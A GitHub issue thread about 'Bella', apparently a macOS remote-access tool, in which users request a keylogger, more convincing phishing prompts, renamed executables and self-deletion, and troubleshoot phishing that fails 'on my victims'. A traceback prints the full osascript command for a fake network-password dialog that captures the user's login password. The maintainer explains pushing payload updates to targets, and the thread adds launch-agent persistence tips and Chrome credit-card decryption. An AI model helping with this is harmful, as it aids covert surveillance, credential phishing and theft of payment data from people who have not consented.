### ISSUE TITLE
Enhancements

### ISSUE THREAD

**Issue by RogueRuins** [manwhoami/Bella#28]
I am sorry, I realize I just said that I didn't have any requests but if you don't mind I'm going to make an issue just for requests

* Change 'server_update' to 'host_update' or 'victim_update'

* Enable keylogger

* Change user pass phish function from asking for keychain password for network, to something like <default browser> helper needs to install. The keychain is to complicated for average users

* Control Center and Bella.py update function. This would be a lot better than redownloading both files

* Being able to change the file name of the executable from Bella to something custom in 'BUILDER'

* Deleting itself after a certain time period 

* Entering passwords collected by other means, for iCloud or users : DONE

* Add poof support to change location of iPhones and Macs

Thanks so much man, love the work you are doing!

**Comment by manwhoami** [comment]
Thanks for the requests. I just changed the user pass phish function a bit. Let me know what you think. I will get started on some of these features and post here when I push them.

**Comment by RogueRuins** [comment]
Awesome, thank you

**Comment by mineo210** [comment]
@manwhoami user_pass_phish sadly doesn't work on my victims :(

**Comment by manwhoami** [comment]
Sorry to hear about that. Could you post the error Bella throws?

**Comment by RogueRuins** [comment]
Ya I had the same issue so I had to uninstall Bella manually then re clone the repo and rebuild

**Comment by mineo210** [comment]
@RogueRuins I'll try that :)

**Comment by mineo210** [comment]
@manwhoami I get this: [/private/var/root] user_pass_phish
Attempting to phish current GUI User [USER]
[-] Malfunction:
```
Traceback (most recent call last):
  File "/Library/Containers/.bella/Bella", line 2011, in bella
    user_pass_phish()
  File "/Library/Containers/.bella/Bella", line 1805, in user_pass_phish
    out = subprocess.check_output(script, shell=True)
  File "/System/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/subprocess.py", line 573, in check_output
    raise CalledProcessError(retcode, cmd, output=output)
CalledProcessError: Command 'launchctl asuser 501 osascript -e 'tell app "Finder" to activate' -e 'tell app "Finder" to display dialog "There was an issue accessing the network \"TeliaGateway58-98-35-B9-22-A3\". To access the network, please enter the user password for USER." default answer "" buttons {"Always Allow", "Deny", "Allow"} with icon file ":tmp:tmpuJzyaq:americangirl" with hidden answer giving up after 15'' returned non-zero exit status 1

```
[USER@USER-MacBook-Air]-[/private/var/root]

**Comment by RogueRuins** [comment]
@mineo210 I am getting the same error

**Comment by manwhoami** [comment]
@mineo210 and @RogueRuins could you post your respective system(s) information?

**Comment by RogueRuins** [comment]
Yup, I am running the most recent version of Bella on my iMac running macOS 10.10.5

**Comment by mineo210** [comment]
@manwhoami MacBook Air (11-inch, Early 2014) Version: 10.12.1

**Comment by manwhoami** [comment]
@RogueRuins okay, so the latest updates should have fixed this error on yosemite. I will get to a yosemite machine and try to see whats up. 

@mineo210 okay thanks.

Does iCloud phish work for both of you?

**Comment by RogueRuins** [comment]
I think so, let me try

**Comment by mineo210** [comment]
yes iCloud works, I used it instead before..

**Comment by manwhoami** [comment]
So i've pushed some changes to Bella. You will have to update your targets with this new version. 

This version will send back the information that is crashing you two.

Post that information here. Thanks!

**Comment by mineo210** [comment]
Ok

**Comment by mineo210** [comment]
nothing happens when I type "git pull"

**Comment by manwhoami** [comment]
@mineo210 apologies. just synced.

**Comment by mineo210** [comment]
@manwhoami you rock man!

**Comment by mineo210** [comment]
@manwhoami how do I update the payload inside the shell?

**Comment by manwhoami** [comment]
Build the new payload with builder.

Inside the Control Center, connect to the target. Run update_server. It will ask for a file location. Drag and drop the new payload into the control center, or manually type in the location of the new payload.

Be careful as to what you type in for the file name. If you update with the wrong file, [like some random PDF for example], then you will lose your shell! I am adding a way in the next update to detect if a proper bella build is being sent over.

**Comment by mineo210** [comment]
@manwhoami sweet!

**Comment by mineo210** [comment]
@manwhoami is there a complete list with ALL the commands featured with Bella?

**Comment by mineo210** [comment]
@manwhoami I get this error:
Attempting to phish current GUI User [USER]
[-] Waiting for user input.
[-] Error! [51:353: execution error: Finder drabbades av ett fel: Filen file :tmp:tmpjNU_ga:americangirl hittades inte. (-43)


that is on swedish so if i translate it it is "Finder got caused by an error: the File file:tmp:tmpjNU_ga:americangirl was not found (-43)

**Comment by RogueRuins** [comment]
Hey @manwhoami, I wasn't having the error where you cannot type 'b' then I updated Bella and it no longer works... But capital 'B' does work but for commands that is problematic

**Comment by mineo210** [comment]
@RogueRuins exactly the same for me.. like doing "cd liBrary" works but "Bella_info" doesnt

**Comment by RogueRuins** [comment]
Ya I was gonna try rebooting the server I can't type in the command and reboot_server doesn't work

**Comment by mineo210** [comment]
@RogueRuins why is rebooting the server good?

**Comment by RogueRuins** [comment]
BC it could reload something that was messed up on update but idk

**Comment by mineo210** [comment]
oh

**Comment by RogueRuins** [comment]
Ya but I might just manually reboot

**Comment by mineo210** [comment]
tho how do I kill the LaunchCTL? it says this when I try running it on another target where I already exec the payload but later deleted it in Eggshell.. 

[], [/library/containers/.bella]
Bella is not in the proper folder. Resetting
Created Launch Agent
Moving Bella
Loading Launch Agent
Bella is already loaded in LaunchCTL.

it wont connect :(

**Comment by RogueRuins** [comment]
Oh, just got to /Library/LaunchAgent/ and delete com.apple.Bella if you are root, if not got to ~/Library/LaunchAgent or Daemon and delete com.apple.Bella

**Comment by RogueRuins** [comment]
Then a reboot wouldn't hurt

**Comment by mineo210** [comment]
@RogueRuins Thanks!

**Comment by mineo210** [comment]
@RogueRuins I could skip the reboot with "sudo launchctl unload com.apple.Bella.plist" and then exec the payload again

**Comment by RogueRuins** [comment]
nice

**Comment by Scriptkidy** [comment]
not typing the b key works for me is it fixed?

**Comment by Scriptkidy** [comment]
i have a request. maybe you can add a update bella command?
i know the update server command but maybe you can make it download the latest from github?
if you can than that would be great!

**Comment by RogueRuins** [comment]
@Scriptkidy just cd into your Bella folder and type the command got pull and it will update

**Comment by Scriptkidy** [comment]
k

**Comment by Scriptkidy** [comment]
wait it did not work i am a noob with git i did `git pull` inside ~/Desktop/bella-master

**Comment by RogueRuins** [comment]
@Scriptkidy you type in '''cd ~/Desktop/bella-master/''' then '''git pull'''

**Comment by RogueRuins** [comment]
Wait do you have any clients yet? If not you should re clone the repo by typing 'git clone https://github.com/manwhoami/bella'

**Comment by Scriptkidy** [comment]
i get error
`fatal: Not a git repository (or any of the parent directories): .git`
and yes i have one client its on my own computer its just for testing i don't care if i lose it

**Comment by manwhoami** [comment]
Expect most of these and many more new features by this coming Monday, March 13th.

**Comment by mineo210** [comment]
@manwhoami Awesome!

**Comment by manwhoami** [comment]
@mineo210 I have just pushed a bug fix that will fix the error you got when running user_pass_phish. Turns out it was a permissions error that I was missing with multi user support. Newest version of Bella `1.20` fixes this bug, adds chrome credit card decryption, and adds support for manual updating / deletion of iCloud and user passwords.

**Comment by mineo210** [comment]
@manwhoami wow sick! I'll try it out thanks for making this repo man!

**Comment by BlackDeveraux** [comment]
Is there an existing way of switching clients without exiting the current control_center instance?

**Comment by manwhoami** [comment]
There is no existing way @BlackDeveraux . I will play around with adding a feature for this
